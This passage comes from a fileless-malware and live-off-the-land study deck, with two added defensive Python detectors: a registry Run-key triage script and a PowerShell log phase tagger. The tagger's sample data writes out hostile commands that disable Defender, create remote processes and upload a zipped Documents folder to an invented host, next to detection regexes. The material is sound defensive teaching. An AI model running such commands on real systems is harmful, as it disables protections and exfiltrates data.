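def decode_encoded_command(command):
    """Recover the script behind -EncodedCommand, or None if there is none."""
    m = ENCODED_FLAG.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:   # bad base64 (binascii.Error) or bad UTF-16 both derive from ValueError
        return None


def static_signature_hit(text):
    """True if the raw text itself contains a download-cradle string."""
    return bool(DOWNLOAD_CRADLE.search(text))


def triage(text):
    """Flag Run values that look like fileless launchers; benign entries are dropped."""
    findings = []
    for name, data in parse_reg_query(text):
        reasons = []
        exe = launcher(data)
        if exe in SCRIPT_HOSTS:
            reasons.append(f"launches script host {exe}")
        decoded = decode_encoded_command(data)
        if decoded is not None:
            reasons.append("encoded command")
        if HIDDEN_FLAGS.search(data):
            reasons.append("hidden/no-profile flags")
        # Match the signature against the decoded script when there is one:
        # against the raw value the base64 blob hides the cradle completely.
        if static_signature_hit(decoded or data):
            reasons.append("download cradle")
        if reasons:
            findings.append({"value": name, "launcher": exe,
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REG_QUERY):
        print(f["value"], f["reasons"], "->", f["decoded"])
```

The point to take from the run: the raw registry value never contains `DownloadString`, so a scanner that only signatures stored strings sees a harmless-looking `powershell.exe` entry; only after decoding does the download cradle appear. On a live host the same checks can be fed from `reg query` output for both the HKCU and HKLM Run and RunOnce keys.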
85
Initial execution dependency
Initial execution dependency means fileless malware may still rely on a user running a script, attachment, or Trojan package to begin execution.<br><br><b>Example:</b> A user opens a downloaded script that starts memory-resident malware activity.<br><br><b>Memory trick:</b> Fileless attacks may still need a starting trigger.<br><br><b>Trick question tip:</b> Fileless does not always mean no user action or no initial file involvement.
86
Shellcode
Shellcode is a small, self-contained piece of code that an exploit or dropper runs first on a host; the name comes from early examples that simply spawned a command shell, and modern malware uses it as a minimal first stage that establishes a backdoor and fetches the rest.<br><br><b>Example:</b> Fileless malware uses small shellcode to open a backdoor mechanism and retrieve more payloads.<br><br><b>Memory trick:</b> Shellcode is small code that opens the door.<br><br><b>Trick question tip:</b> Lightweight code used for backdoor setup points to shellcode.
87
Backdoor mechanism
A backdoor mechanism provides hidden or unauthorized access to a host after compromise.<br><br><b>Example:</b> Shellcode creates a way for the threat actor to return and download additional packages.<br><br><b>Memory trick:</b> Backdoor means secret return entrance.<br><br><b>Trick question tip:</b> Unauthorized hidden access after compromise is a backdoor.
88
Obfuscated shellcode
Obfuscated shellcode is shellcode rewritten, encoded, or encrypted so that the bytes a scanner sees no longer match known signatures, with a small decoder stub restoring the real code only at run time.<br><br><b>Example:</b> The attacker recompiles or re-encodes the same shellcode into a different form so that a signature written for the original bytes no longer matches.<br><br><b>Memory trick:</b> Obfuscated shellcode wears a disguise.<br><br><b>Trick question tip:</b> Recompiled or disguised code to evade scanners points to obfuscation.
89
Payload download
Fileless malware may download additional packages or payloads after the initial backdoor is established.<br><br><b>Example:</b> Shellcode downloads another payload to complete the threat actor’s objective.<br><br><b>Memory trick:</b> Small starter code can pull bigger payloads later.<br><br><b>Trick question tip:</b> Downloading additional payloads after initial execution is common in modern malware.
90
On-the-fly compilation
On-the-fly compilation builds or compiles code during execution to avoid storing obvious static malware files.<br><br><b>Example:</b> A payload is streamed and compiled during execution to avoid automated detection.<br><br><b>Memory trick:</b> On the fly means built while running.<br><br><b>Trick question tip:</b> Streaming, compiling, and obfuscating during execution are fileless evasion techniques.
91
Static threat detection
Static threat detection identifies malware based on stored files, known signatures, or unchanging code patterns.<br><br><b>Example:</b> A scanner detects a known malicious executable stored on disk.<br><br><b>Memory trick:</b> Static detection looks for known files or patterns.<br><br><b>Trick question tip:</b> Fileless and obfuscated malware evolved partly to evade static detection.
92
Live off the land
Live off the land means using legitimate built-in system tools instead of compiled malicious executables to perform attacker actions.<br><br><b>Example:</b> An attacker uses PowerShell and WMI to scan systems, change settings, and move data.<br><br><b>Memory trick:</b> Live off the land means use what is already there.<br><br><b>Trick question tip:</b> Abuse of legitimate admin tools instead of malware binaries points to live off the land.
93
PowerShell abuse
PowerShell abuse uses a legitimate Windows scripting tool to execute malicious payload actions.<br><br><b>Example:</b> Malware uses PowerShell to collect information or change settings with the user’s permissions.<br><br><b>Memory trick:</b> PowerShell can be powerful for admins and attackers.<br><br><b>Trick question tip:</b> PowerShell is a common live off the land and fileless technique.
94
WMI abuse
WMI abuse uses Windows Management Instrumentation to execute commands, manage systems, or support malicious activity.<br><br><b>Example:</b> Malware uses WMI to run commands without dropping a traditional executable.<br><br><b>Memory trick:</b> WMI lets attackers manage Windows like admins do.<br><br><b>Trick question tip:</b> WMI is a common legitimate tool abused in fileless attacks.
95
Sufficient permissions in LOTL
Sufficient permissions allow live off the land tools to perform powerful actions such as scanning, reconfiguring settings, and exfiltrating data.<br><br><b>Example:</b> A compromised account with elevated permissions lets scripts make system changes and access sensitive data.<br><br><b>Memory trick:</b> Built-in tools become dangerous with the right permissions.<br><br><b>Trick question tip:</b> Fileless malware effectiveness often depends on permissions.
96
LOTL scanning
LOTL scanning uses legitimate system tools to discover hosts, services, or resources.<br><br><b>Example:</b> A script uses built-in commands to identify reachable systems.<br><br><b>Memory trick:</b> Scanning can happen with normal tools.<br><br><b>Trick question tip:</b> Live off the land does not require a separate scanner executable.
97
LOTL reconfiguration
LOTL reconfiguration uses legitimate system tools to change settings for attacker objectives.<br><br><b>Example:</b> A script changes security settings using built-in administration tools.<br><br><b>Memory trick:</b> Legit tools can still change defenses.<br><br><b>Trick question tip:</b> Reconfiguring settings with built-in tools is live off the land behavior.
98
LOTL data exfiltration
LOTL data exfiltration uses legitimate tools or scripting environments to move data out of the environment.<br><br><b>Example:</b> A script uses built-in network capabilities to transmit collected data.<br><br><b>Memory trick:</b> Exfiltration can ride on trusted tools.<br><br><b>Trick question tip:</b> Data theft using legitimate scripting tools can be fileless/LOTL behavior.
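An added example, not part of the course material, showing how the WMI abuse, LOTL scanning, reconfiguration and exfiltration cards above look from the defender's side. It tags constructed PowerShell script block log entries (Event ID 4104 in the PowerShell Operational log, recorded when Script Block Logging is enabled; the logged text is the block as it executed, so an encoded command appears decoded) with the LOTL phase each one belongs to, then escalates only when one session chains several phases together, because any single built-in command is something an administrator might legitimately run. The host name fs01, the 10.0.0.5 address and the five sample blocks are invented, and the patterns are illustrative rather than a production rule set.

```python
"""Phase-tagging PowerShell script block logs for live-off-the-land activity.

Added example, not course code. Input is the ScriptBlockText of Event ID 4104
records, constructed inline here so the example runs offline.
"""
import re

# (phase, pattern): which LOTL phase a script block belongs to.
# Illustrative patterns only; a real rule set is far larger.
RULES = [
    ("scanning", re.compile(
        r"(?i)Test-NetConnection|Test-Connection|Get-NetNeighbor|Resolve-DnsName"
        r"|Get-ADComputer|\bnet\s+view\b")),
    ("remote execution", re.compile(
        r"(?i)Invoke-(?:Wmi|Cim)Method\s.*Win32_Process|Invoke-Command\s.*-ComputerName"
        r"|wmic\s.*process\s+call\s+create")),
    ("reconfiguration", re.compile(
        r"(?i)(?:Set|Add)-MpPreference|netsh\s+advfirewall"
        r"|Set-ItemProperty\s.*CurrentVersion\\Run|Disable-WindowsOptionalFeature")),
    ("exfiltration", re.compile(
        r"(?i)Invoke-(?:WebRequest|RestMethod)\s.*-Method\s+Post|UploadFile|UploadString"
        r"|Compress-Archive|Send-MailMessage")),
]

# Constructed sample: ScriptBlockText of five events from one session, in order.
# The first is ordinary user activity; fs01 and 10.0.0.5 are invented.
SAMPLE_4104 = [
    "Get-ChildItem C:\\Users\\alice\\Documents -Recurse -Include *.docx | Measure-Object",
    "1..254 | ForEach-Object { Test-NetConnection -ComputerName 10.0.0.$_ -Port 445 -InformationLevel Quiet }",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "Invoke-WmiMethod -ComputerName fs01 -Class Win32_Process -Name Create "
    "-ArgumentList 'cmd /c whoami > C:\\Windows\\Temp\\w.txt'",
    "Compress-Archive -Path C:\\Users\\alice\\Documents -DestinationPath $env:TEMP\\d.zip; "
    "Invoke-WebRequest -Uri http://10.0.0.5/u -Method Post -InFile $env:TEMP\\d.zip",
]


def classify(script_block):
    """Phases whose pattern appears in one script block, in RULES order."""
    return [phase for phase, pattern in RULES if pattern.search(script_block)]


def sequence_phases(events):
    """Distinct phases in the order they first appear across a session."""
    seen = []
    for text in events:
        for phase in classify(text):
            if phase not in seen:
                seen.append(phase)
    return seen


def is_lotl_chain(events):
    """Escalate when a session shows three or more phases including exfiltration.

    One hit alone is noise (admins do run Test-NetConnection); the chain of
    discovery, defence tampering, remote execution and data movement is the signal.
    """
    phases = sequence_phases(events)
    return len(phases) >= 3 and "exfiltration" in phases


if __name__ == "__main__":
    for text in SAMPLE_4104:
        print(classify(text) or ["-"], text[:60])
    print("chain:", sequence_phases(SAMPLE_4104), "escalate:", is_lotl_chain(SAMPLE_4104))
```

Two practical caveats the cards imply but do not spell out: 4104 events only exist where Script Block Logging has been turned on by policy, and the permissions card applies here too, since `Set-MpPreference` and remote `Win32_Process` creation succeed only when the account running the script already has the rights to do them.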
99
Advanced persistent threat (APT)
APT can describe advanced threat activity that uses stealth, persistence, and sophisticated techniques, including fileless or live off the land methods.<br><br><b>Example:</b> A long-term intrusion uses legitimate tools, registry persistence, and obfuscated code to avoid detection.<br><br><b>Memory trick:</b> APT means advanced and persistent.<br><br><b>Trick question tip:</b> APT emphasizes sustained, advanced intrusion behavior.
100
Advanced volatile threat (AVT)
AVT can describe modern volatile threats that rely heavily on memory-resident and fileless techniques.<br><br><b>Example:</b> A threat runs mostly in memory and avoids leaving traditional malware files on disk.<br><br><b>Memory trick:</b> Volatile means memory-focused and harder to capture later.<br><br><b>Trick question tip:</b> AVT is associated with modern fileless and memory-resident malware.